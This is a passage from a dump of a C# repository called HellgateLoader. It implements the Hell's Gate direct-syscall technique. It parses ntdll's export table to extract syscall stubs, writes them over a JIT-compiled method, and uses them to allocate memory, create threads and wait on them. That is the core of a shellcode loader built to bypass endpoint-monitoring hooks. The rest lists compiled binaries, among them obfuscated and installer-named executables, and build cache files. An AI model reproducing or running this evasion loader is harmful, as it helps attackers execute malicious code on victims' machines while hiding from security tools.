[UnmanagedFunctionPointer(CallingConvention.StdCall)] 9 | public delegate uint NtAllocateVirtualMemory( 10 | IntPtr ProcessHandle, 11 | ref IntPtr BaseAddress, 12 | IntPtr ZeroBits, 13 | ref IntPtr RegionSize, 14 | ulong AllocationType, 15 | ulong Protect); 16 | 17 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 18 | public delegate uint NtCreateThreadEx( 19 | out IntPtr hThread, 20 | uint DesiredAccess, 21 | IntPtr ObjectAttributes, 22 | IntPtr ProcessHandle, 23 | IntPtr lpStartAddress, 24 | IntPtr lpParameter, 25 | bool CreateSuspended, 26 | uint StackZeroBits, 27 | uint SizeOfStackCommit, 28 | uint SizeOfStackReserve, 29 | IntPtr lpBytesBuffer); 30 | 31 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 32 | public delegate uint NtWaitForSingleObject(IntPtr Object, bool Alertable, uint Timeout); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /HellgateLoader/SyscallRes/SyscallFunctions.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Reflection; 3 | using System.Runtime.CompilerServices; 4 | using System.Runtime.InteropServices; 5 | 6 | namespace HellgateLoader.SyscallRes 7 | { 8 | class SyscallFunctions 9 | { 10 | 11 | private IntPtr ManagedMethodAddress { get; set; } = IntPtr.Zero; 12 | private IntPtr UnmanagedMethodAddress { get; set; } = IntPtr.Zero; 13 | private object Mutant { get; set; } = new object(); 14 | 15 | 16 | [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)] 17 | private static UInt32 Gate() 18 | { 19 | return new UInt32(); 20 | } 21 | 22 | public bool GenerateRWXMemorySegment() 23 | { 24 | // Find and JIT the method 25 | MethodInfo method = typeof(SyscallFunctions).GetMethod(nameof(Gate), BindingFlags.Static | BindingFlags.NonPublic); 26 | if (method == null) 27 | { 28 | Console.WriteLine("Unable to find the method"); 29 | return false; 30 | } 31 | RuntimeHelpers.PrepareMethod(method.MethodHandle); 32 | #if DEBUG 33 | // Get the address of the function and check if first opcode == JMP 34 | IntPtr pMethod = method.MethodHandle.GetFunctionPointer(); 35 | 36 | Console.WriteLine($"\t[*] Relative Address: 0x{pMethod.ToInt64():X16}"); 37 | Console.Write($"{Marshal.ReadByte(pMethod, -1):X2} # "); 38 | Console.Write($"{Marshal.ReadByte(pMethod, 0):X2}"); 39 | Console.Write($"{Marshal.ReadByte(pMethod, 1):X2}"); 40 | Console.Write($"{Marshal.ReadByte(pMethod, 2):X2}"); 41 | Console.Write($"{Marshal.ReadByte(pMethod, 3):X2}"); 42 | Console.Write($"{Marshal.ReadByte(pMethod, 4):X2}"); 43 | Console.Write($"{Marshal.ReadByte(pMethod, 5):X2}"); 44 | Console.Write($"{Marshal.ReadByte(pMethod, 6):X2}"); 45 | Console.Write($"{Marshal.ReadByte(pMethod, 7):X2}"); 46 | Console.Write($" # {Marshal.ReadByte(pMethod, 8):X2}"); 47 | 48 | if (Marshal.ReadByte(pMethod) != 0xe9) 49 | { 50 | Console.WriteLine("Method was not JIT'ed or invalid stub"); 51 | return false; 52 | } 53 | 54 | // Get address of jited method and stack alignment 55 | Int32 offset = Marshal.ReadInt32(pMethod, 1); 56 | UInt64 addr = (UInt64)pMethod + (UInt64)offset; 57 | 58 | int count = 0; 59 | while (addr % 16 != 0){ 60 | count++; 61 | addr++; 62 | } 63 | Console.WriteLine("\nCount = " + count); 64 | 65 | this.UnmanagedMethodAddress = (IntPtr)addr; 66 | # else 67 | this.ManagedMethodAddress = method.MethodHandle.GetFunctionPointer(); 68 | # endif 69 | return true; 70 | } 71 | 72 | private T NtInvocation(byte[] Syscall_byte) where T : Delegate 73 | { 74 | if (Syscall_byte.Length == 0) 75 | { 76 | Console.WriteLine("Syscall byte is null"); 77 | return null; 78 | } 79 | 80 | IntPtr Desitnation_address = IntPtr.Zero; 81 | 82 | # if DEBUG 83 | Desitnation_address = this.UnmanagedMethodAddress; 84 | # else 85 | Desitnation_address = this.ManagedMethodAddress; 86 | # endif 87 | 88 | Marshal.Copy(Syscall_byte, 0, Desitnation_address, Syscall_byte.Length); 89 | return Marshal.GetDelegateForFunctionPointer(Desitnation_address); 90 | } 91 | 92 | public UInt32 NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize, UInt32 AllocationType, UInt32 Protect) 93 | { 94 | lock (this.Mutant) 95 | { 96 | byte[] syscall = new byte[24]; 97 | foreach (var temp in SyscallTable.Syscall_list) 98 | { 99 | if (temp.Name.ToLower() == "NtAllocateVirtualMemory".ToLower()) 100 | { 101 | syscall = temp.syscall_byte; 102 | } 103 | } 104 | 105 | SyscallDelegates.NtAllocateVirtualMemory Func = NtInvocation(syscall); 106 | return Func(ProcessHandle, ref BaseAddress, ZeroBits, ref RegionSize, AllocationType, Protect); 107 | } 108 | } 109 | 110 | public UInt32 NtCreateThreadEx(out IntPtr hThread, uint DesiredAccess, IntPtr ObjectAttributes, IntPtr ProcessHandle, IntPtr lpStartAddress, IntPtr lpParameter, bool CreateSuspended, uint StackZeroBits, uint SizeOfStackCommit, uint SizeOfStackReserve, IntPtr lpBytesBuffer) 111 | { 112 | lock (this.Mutant) 113 | { 114 | byte[] syscall = new byte[24]; 115 | foreach (var temp in SyscallTable.Syscall_list) 116 | { 117 | if (temp.Name.ToLower() == "NtCreateThreadEx".ToLower()) 118 | { 119 | syscall = temp.syscall_byte; 120 | } 121 | } 122 | 123 | SyscallDelegates.NtCreateThreadEx Func = NtInvocation(syscall); 124 | return Func(out hThread, DesiredAccess, ObjectAttributes, ProcessHandle, lpStartAddress, lpParameter, CreateSuspended, StackZeroBits, SizeOfStackCommit, SizeOfStackReserve, lpBytesBuffer); 125 | } 126 | } 127 | 128 | public UInt32 NtWaitForSingleObject(IntPtr Object, bool Alertable, uint Timeout) 129 | { 130 | lock (this.Mutant) 131 | { 132 | byte[] syscall = new byte[24]; 133 | foreach (var temp in SyscallTable.Syscall_list) 134 | { 135 | if (temp.Name.ToLower() == "NtWaitForSingleObject".ToLower()) 136 | { 137 | syscall = temp.syscall_byte; 138 | } 139 | } 140 | 141 | SyscallDelegates.NtWaitForSingleObject Func = NtInvocation(syscall); 142 | return Func(Object, Alertable, Timeout); 143 | } 144 | } 145 | } 146 | } 147 | -------------------------------------------------------------------------------- /HellgateLoader/SyscallRes/SyscallTable.cs: -------------------------------------------------------------------------------- 1 | using System.Collections.Generic; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace HellgateLoader.SyscallRes 5 | { 6 | class SyscallTable 7 | { 8 | public static List Syscall_list = new List(); 9 | 10 | public SyscallTable() 11 | { 12 | 13 | APITableEntry v1 = new APITableEntry(); 14 | APITableEntry v2 = new APITableEntry(); 15 | APITableEntry v3 = new APITableEntry(); 16 | 17 | v1.Name = "NtAllocateVirtualMemory"; 18 | v2.Name = "NtCreateThreadEx"; 19 | v3.Name = "NtWaitForSingleObject"; 20 | 21 | Syscall_list.Add(v1); 22 | Syscall_list.Add(v2); 23 | Syscall_list.Add(v3); 24 | 25 | return; 26 | } 27 | 28 | public struct APITableEntry 29 | { 30 | public string Name; 31 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 24)] 32 | public byte[] syscall_byte; 33 | } 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /HellgateLoader/Utils/MemoryUtil.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | using System.Linq; 4 | using System.Runtime.InteropServices; 5 | using System.Text; 6 | 7 | namespace HellgateLoader.Utils 8 | { 9 | class MemoryUtil 10 | { 11 | public static MemoryStream LoadModule(string ModulePath) 12 | { 13 | byte[] ModuleBlob = File.ReadAllBytes(ModulePath); 14 | if (ModuleBlob.Length == 0x00) 15 | { 16 | Console.WriteLine("Empty module content: " + ModulePath); 17 | return null; 18 | } 19 | 20 | MemoryStream ModuleStream = new MemoryStream(ModuleBlob.ToArray()); 21 | return ModuleStream; 22 | } 23 | 24 | public static Object GetStructureFromBlob(MemoryStream ModuleStream, Int64 offset, int TypeSize, Object Object_instance) 25 | { 26 | byte[] bytes = GetStructureBytesFromOffset(ModuleStream, offset, TypeSize); 27 | if (Marshal.SizeOf(Object_instance) != bytes.Length) 28 | return default; 29 | 30 | IntPtr ptr = Marshal.AllocHGlobal(TypeSize); 31 | Marshal.Copy(bytes.ToArray(), 0, ptr, bytes.Length); 32 | Object Temp_instance = Marshal.PtrToStructure(ptr, Object_instance.GetType()); 33 | 34 | Marshal.FreeHGlobal(ptr); 35 | return Temp_instance; 36 | } 37 | 38 | public static byte[] GetStructureBytesFromOffset(MemoryStream ModuleStream, Int64 offset, int TypeSize) 39 | { 40 | byte[] s = new byte[TypeSize]; 41 | ModuleStream.Seek(offset, SeekOrigin.Begin); 42 | ModuleStream.Read(s, 0, TypeSize); 43 | return s; 44 | } 45 | 46 | public static UInt16 ReadInt16FromStream(MemoryStream ModuleStream, Int64 offset) 47 | { 48 | byte[] s = new byte[2]; 49 | ModuleStream.Seek(offset, SeekOrigin.Begin); 50 | ModuleStream.Read(s, 0, 2); 51 | return BitConverter.ToUInt16(s, 0); 52 | } 53 | 54 | public static UInt32 ReadInt32FromStream(MemoryStream ModuleStream, Int64 offset) 55 | { 56 | byte[] s = new byte[4]; 57 | ModuleStream.Seek(offset, SeekOrigin.Begin); 58 | ModuleStream.Read(s, 0, 4); 59 | return BitConverter.ToUInt32(s, 0); 60 | } 61 | 62 | public static byte[] ReadSyscallFromStream(MemoryStream ModuleStream, Int64 offset) 63 | { 64 | byte[] s = new byte[24]; 65 | ModuleStream.Seek(offset, SeekOrigin.Begin); 66 | ModuleStream.Read(s, 0, 24); 67 | return s; 68 | } 69 | 70 | public static string ReadAscStrFromStream(MemoryStream ModuleStream, Int64 offset) 71 | { 72 | int length = 0; 73 | ModuleStream.Seek(offset, SeekOrigin.Begin); 74 | while (ModuleStream.ReadByte() != 0x00) 75 | length++; 76 | 77 | byte[] s = new byte[length]; 78 | ModuleStream.Seek(offset, SeekOrigin.Begin); 79 | ModuleStream.Read(s, 0, length); 80 | return Encoding.ASCII.GetString(s); 81 | } 82 | } 83 | } 84 | -------------------------------------------------------------------------------- /HellgateLoader/Utils/ModuleUtil.cs: -------------------------------------------------------------------------------- 1 | using HellgateLoader.SyscallRes; 2 | using System; 3 | using System.IO; 4 | using System.Linq; 5 | using System.Runtime.InteropServices; 6 | using static HellgateLoader.NativeStructs; 7 | using static HellgateLoader.SyscallRes.SyscallTable; 8 | using static HellgateLoader.Utils.MemoryUtil; 9 | 10 | namespace HellgateLoader.Utils 11 | { 12 | class ModuleUtil 13 | { 14 | 15 | public static IMAGE_SECTION_HEADER[] GetSectionArray( 16 | MemoryStream ModuleStream, 17 | IMAGE_FILE_HEADER IMAGE_FILE_HEADER_instance, 18 | IMAGE_DOS_HEADER IMAGE_DOS_HEADER_instance, 19 | IMAGE_NT_HEADER64 IMAGE_NT_HEADER64_instance) 20 | { 21 | IMAGE_SECTION_HEADER IMAGE_SECTION_HEADER_instance = new IMAGE_SECTION_HEADER(); 22 | IMAGE_SECTION_HEADER[] IMAGE_SECTION_HEADER_array = new IMAGE_SECTION_HEADER[IMAGE_FILE_HEADER_instance.NumberOfSections]; 23 | 24 | for (Int16 count = 0; count < IMAGE_FILE_HEADER_instance.NumberOfSections; count++) 25 | { 26 | 27 | Int64 Section_offset = GetModuleSectionOffset(count, IMAGE_DOS_HEADER_instance, IMAGE_NT_HEADER64_instance); 28 | 29 | IMAGE_SECTION_HEADER_instance = (IMAGE_SECTION_HEADER)GetStructureFromBlob( 30 | ModuleStream, Section_offset, 31 | Marshal.SizeOf(IMAGE_SECTION_HEADER_instance), 32 | IMAGE_SECTION_HEADER_instance); 33 | 34 | IMAGE_SECTION_HEADER_array[count] = IMAGE_SECTION_HEADER_instance; 35 | Console.WriteLine(IMAGE_SECTION_HEADER_instance.SectionName); 36 | } 37 | 38 | // Console.WriteLine(IMAGE_FILE_HEADER_instance.NumberOfSections); 39 | 40 | 41 | 42 | return IMAGE_SECTION_HEADER_array; 43 | } 44 | 45 | 46 | private static Int64 GetModuleSectionOffset(Int16 count, IMAGE_DOS_HEADER IMAGE_DOS_HEADER_instance, IMAGE_NT_HEADER64 IMAGE_NT_HEADER64_instance) 47 | { 48 | Int64 Section_offset = IMAGE_DOS_HEADER_instance.e_lfanew 49 | + Marshal.SizeOf(typeof(IMAGE_FILE_HEADER)) 50 | + IMAGE_NT_HEADER64_instance.FileHeader.SizeOfOptionalHeader 51 | + sizeof(Int32) // sizeof(DWORD) 52 | + (Marshal.SizeOf(typeof(IMAGE_SECTION_HEADER)) * count); 53 | 54 | return Section_offset; 55 | } 56 | 57 | public static IMAGE_SECTION_HEADER GetSectionByRVA(Int64 rva, IMAGE_SECTION_HEADER[] IMAGE_SECTION_HEADER_array) 58 | { 59 | // this.ModuleSectionHeaders.Where(x => rva > x.VirtualAddress && rva <= x.VirtualAddress + x.SizeOfRawData).First(); 60 | 61 | for (int count = 0; count < IMAGE_SECTION_HEADER_array.Count(); count++) 62 | { 63 | if (rva > IMAGE_SECTION_HEADER_array[count].VirtualAddress && 64 | rva <= IMAGE_SECTION_HEADER_array[count].VirtualAddress + IMAGE_SECTION_HEADER_array[count].SizeOfRawData) 65 | { 66 | return IMAGE_SECTION_HEADER_array[count]; 67 | } 68 | } 69 | 70 | IMAGE_SECTION_HEADER IMAGE_SECTION_HEADER_instance = new IMAGE_SECTION_HEADER(); 71 | return IMAGE_SECTION_HEADER_instance; 72 | } 73 | 74 | public static Int64 ConvertRvaToOffset(Int64 rva, IMAGE_SECTION_HEADER[] IMAGE_SECTION_HEADER_array) 75 | { 76 | IMAGE_SECTION_HEADER IMAGE_SECTION_HEADER_instance = GetSectionByRVA(rva, IMAGE_SECTION_HEADER_array); 77 | 78 | Int64 offset = rva - IMAGE_SECTION_HEADER_instance.VirtualAddress + IMAGE_SECTION_HEADER_instance.PointerToRawData; 79 | return offset; 80 | } 81 | 82 | public static void SetSyscallTable(string ModulePath) 83 | { 84 | MemoryStream ModuleStream = MemoryUtil.LoadModule(ModulePath); 85 | int IMAGE_DIRECTORY_ENTRY_EXPORT = 0; 86 | 87 | IMAGE_DOS_HEADER IMAGE_DOS_HEADER_instance = new IMAGE_DOS_HEADER(); 88 | IMAGE_DOS_HEADER_instance = (IMAGE_DOS_HEADER)MemoryUtil.GetStructureFromBlob( 89 | ModuleStream, 90 | 0, 91 | Marshal.SizeOf(IMAGE_DOS_HEADER_instance), 92 | IMAGE_DOS_HEADER_instance); 93 | 94 | IMAGE_NT_HEADER64 IMAGE_NT_HEADER64_instance = new IMAGE_NT_HEADER64(); 95 | IMAGE_NT_HEADER64_instance = (IMAGE_NT_HEADER64)MemoryUtil.GetStructureFromBlob( 96 | ModuleStream, 97 | IMAGE_DOS_HEADER_instance.e_lfanew, 98 | Marshal.SizeOf(IMAGE_NT_HEADER64_instance), 99 | IMAGE_NT_HEADER64_instance); 100 | 101 | IMAGE_FILE_HEADER IMAGE_FILE_HEADER_instance = IMAGE_NT_HEADER64_instance.FileHeader; 102 | IMAGE_SECTION_HEADER[] IMAGE_SECTION_HEADER_array = new IMAGE_SECTION_HEADER[IMAGE_FILE_HEADER_instance.NumberOfSections]; 103 | IMAGE_SECTION_HEADER_array = GetSectionArray( 104 | ModuleStream, 105 | IMAGE_FILE_HEADER_instance, 106 | IMAGE_DOS_HEADER_instance, 107 | IMAGE_NT_HEADER64_instance); 108 | 109 | IMAGE_DATA_DIRECTORY IMAGE_DATA_DIRECTORY_instance = IMAGE_NT_HEADER64_instance.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; 110 | // Console.WriteLine(IMAGE_DATA_DIRECTORY_instance.VirtualAddress); 111 | 112 | IMAGE_EXPORT_DIRECTORY IMAGE_EXPORT_DIRECTORY_instance = new IMAGE_EXPORT_DIRECTORY(); 113 | IMAGE_EXPORT_DIRECTORY_instance = (IMAGE_EXPORT_DIRECTORY)MemoryUtil.GetStructureFromBlob( 114 | ModuleStream, 115 | ConvertRvaToOffset(IMAGE_DATA_DIRECTORY_instance.VirtualAddress, IMAGE_SECTION_HEADER_array), 116 | Marshal.SizeOf(IMAGE_EXPORT_DIRECTORY_instance), 117 | IMAGE_EXPORT_DIRECTORY_instance); 118 | 119 | SetSyscallBytes(ModuleStream, IMAGE_EXPORT_DIRECTORY_instance, IMAGE_SECTION_HEADER_array); 120 | 121 | } 122 | 123 | private static void SetSyscallBytes( 124 | MemoryStream ModuleStream, 125 | IMAGE_EXPORT_DIRECTORY IMAGE_EXPORT_DIRECTORY_instance, 126 | IMAGE_SECTION_HEADER[] IMAGE_SECTION_HEADER_array) 127 | { 128 | Int64 AddressOfFunctions_offset = ConvertRvaToOffset(IMAGE_EXPORT_DIRECTORY_instance.AddressOfFunctions, IMAGE_SECTION_HEADER_array); 129 | Int64 AddressOfNameOrdinals_offset = ConvertRvaToOffset(IMAGE_EXPORT_DIRECTORY_instance.AddressOfNameOrdinals, IMAGE_SECTION_HEADER_array); 130 | Int64 AddressOfNames_offset = ConvertRvaToOffset(IMAGE_EXPORT_DIRECTORY_instance.AddressOfNames, IMAGE_SECTION_HEADER_array); 131 | 132 | SyscallTable Syscall_table = new SyscallTable(); 133 | 134 | UInt32 NumberOfNames = IMAGE_EXPORT_DIRECTORY_instance.NumberOfNames; 135 | 136 | for (int iterate_num = 0; iterate_num < NumberOfNames; iterate_num++) 137 | { 138 | UInt32 AddressOfNames_single_rva = ReadInt32FromStream(ModuleStream, AddressOfNames_offset + iterate_num * 4); 139 | Int64 AddressOfNames_single_offset = ConvertRvaToOffset(AddressOfNames_single_rva, IMAGE_SECTION_HEADER_array); 140 | 141 | string FuncName_temp = ReadAscStrFromStream(ModuleStream, AddressOfNames_single_offset); 142 | // Console.WriteLine(Func_name); 143 | 144 | for (int index = 0; index < SyscallTable.Syscall_list.Count(); index++) 145 | { 146 | if (FuncName_temp.ToLower() == SyscallTable.Syscall_list[index].Name.ToLower()) 147 | { 148 | UInt16 AddressOfNamesOrdinals_single_offset = ReadInt16FromStream( 149 | ModuleStream, 150 | AddressOfNameOrdinals_offset + 2 * iterate_num); 151 | 152 | Console.WriteLine(AddressOfNamesOrdinals_single_offset); 153 | 154 | UInt32 AddressOfFunctions_single_rva = ReadInt32FromStream( 155 | ModuleStream, AddressOfFunctions_offset + 4 * AddressOfNamesOrdinals_single_offset); 156 | 157 | Int64 AddressOfFunctions_single_offset = ConvertRvaToOffset(AddressOfFunctions_single_rva, IMAGE_SECTION_HEADER_array); 158 | 159 | byte[] Syscall_byte = new byte[24]; 160 | Syscall_byte = ReadSyscallFromStream(ModuleStream, AddressOfFunctions_single_offset); 161 | 162 | APITableEntry APITableEntry_instance = SyscallTable.Syscall_list[index]; 163 | APITableEntry_instance.Name = Syscall_list[index].Name; 164 | APITableEntry_instance.syscall_byte = Syscall_byte; 165 | SyscallTable.Syscall_list[index] = APITableEntry_instance; 166 | 167 | for (int temp_num = 0; temp_num < Syscall_byte.Length; temp_num++) 168 | { 169 | Console.Write("{0} ", Syscall_byte[temp_num].ToString("x2")); 170 | 171 | } 172 | Console.Write("\n"); 173 | } 174 | } 175 | } 176 | } 177 | } 178 | } 179 | -------------------------------------------------------------------------------- /HellgateLoader/bin/Debug/HellgateLoader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/bin/Debug/HellgateLoader.exe -------------------------------------------------------------------------------- /HellgateLoader/bin/Debug/HellgateLoader.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /HellgateLoader/bin/Debug/HellgateLoader.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/bin/Debug/HellgateLoader.pdb -------------------------------------------------------------------------------- /HellgateLoader/bin/Release/HellgateLoader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/bin/Release/HellgateLoader.exe -------------------------------------------------------------------------------- /HellgateLoader/bin/Release/HellgateLoader.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /HellgateLoader/bin/Release/HellgateLoader.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/bin/Release/HellgateLoader.pdb -------------------------------------------------------------------------------- /HellgateLoader/bin/x64/Debug/HellgateLoader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/bin/x64/Debug/HellgateLoader.exe -------------------------------------------------------------------------------- /HellgateLoader/bin/x64/Debug/HellgateLoader.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /HellgateLoader/bin/x64/Debug/HellgateLoader.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/bin/x64/Debug/HellgateLoader.pdb -------------------------------------------------------------------------------- /HellgateLoader/bin/x64/Release/HellgateLoader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/bin/x64/Release/HellgateLoader.exe -------------------------------------------------------------------------------- /HellgateLoader/bin/x64/Release/HellgateLoader.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /HellgateLoader/bin/x64/Release/HellgateLoader.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/bin/x64/Release/HellgateLoader.pdb -------------------------------------------------------------------------------- /HellgateLoader/bin/x64/Release/ObfusHell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/bin/x64/Release/ObfusHell.exe -------------------------------------------------------------------------------- /HellgateLoader/bin/x64/Release/ObfusHellgate.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/bin/x64/Release/ObfusHellgate.exe -------------------------------------------------------------------------------- /HellgateLoader/bin/x64/Release/SFLinker_installer.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/bin/x64/Release/SFLinker_installer.exe -------------------------------------------------------------------------------- /HellgateLoader/bin/x64/Release/SFLinker_installer.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/bin/x64/Release/SFLinker_installer.rar -------------------------------------------------------------------------------- /HellgateLoader/bin/x64/Release/SFworks_installer.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/bin/x64/Release/SFworks_installer.exe -------------------------------------------------------------------------------- /HellgateLoader/bin/x86/Debug/HellgateLoader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/bin/x86/Debug/HellgateLoader.exe -------------------------------------------------------------------------------- /HellgateLoader/bin/x86/Debug/HellgateLoader.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /HellgateLoader/bin/x86/Debug/HellgateLoader.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/bin/x86/Debug/HellgateLoader.pdb -------------------------------------------------------------------------------- /HellgateLoader/bin/x86/Release/HellgateLoader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/bin/x86/Release/HellgateLoader.exe -------------------------------------------------------------------------------- /HellgateLoader/bin/x86/Release/HellgateLoader.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /HellgateLoader/bin/x86/Release/HellgateLoader.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/bin/x86/Release/HellgateLoader.pdb -------------------------------------------------------------------------------- /HellgateLoader/obj/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /HellgateLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /HellgateLoader/obj/Debug/HellgateLoader.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 28ff49b5e9ec64cc6eefa7c92c930688696005e1 2 | -------------------------------------------------------------------------------- /HellgateLoader/obj/Debug/HellgateLoader.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\bin\Debug\HellgateLoader.exe.config 2 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\bin\Debug\HellgateLoader.exe 3 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\bin\Debug\HellgateLoader.pdb 4 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\Debug\HellgateLoader.csprojAssemblyReference.cache 5 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\Debug\HellgateLoader.csproj.CoreCompileInputs.cache 6 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\Debug\HellgateLoader.exe 7 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\Debug\HellgateLoader.pdb 8 | -------------------------------------------------------------------------------- /HellgateLoader/obj/Debug/HellgateLoader.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/Debug/HellgateLoader.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /HellgateLoader/obj/Debug/HellgateLoader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/Debug/HellgateLoader.exe -------------------------------------------------------------------------------- /HellgateLoader/obj/Debug/HellgateLoader.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/Debug/HellgateLoader.pdb -------------------------------------------------------------------------------- /HellgateLoader/obj/Release/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /HellgateLoader/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName = ".NET Framework 4.8")] 5 | -------------------------------------------------------------------------------- /HellgateLoader/obj/Release/HellgateLoader.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 86aa0e00cfc6849eab65e7ef9f847e72acf31cce 2 | -------------------------------------------------------------------------------- /HellgateLoader/obj/Release/HellgateLoader.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\bin\Release\HellgateLoader.exe.config 2 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\bin\Release\HellgateLoader.exe 3 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\bin\Release\HellgateLoader.pdb 4 | 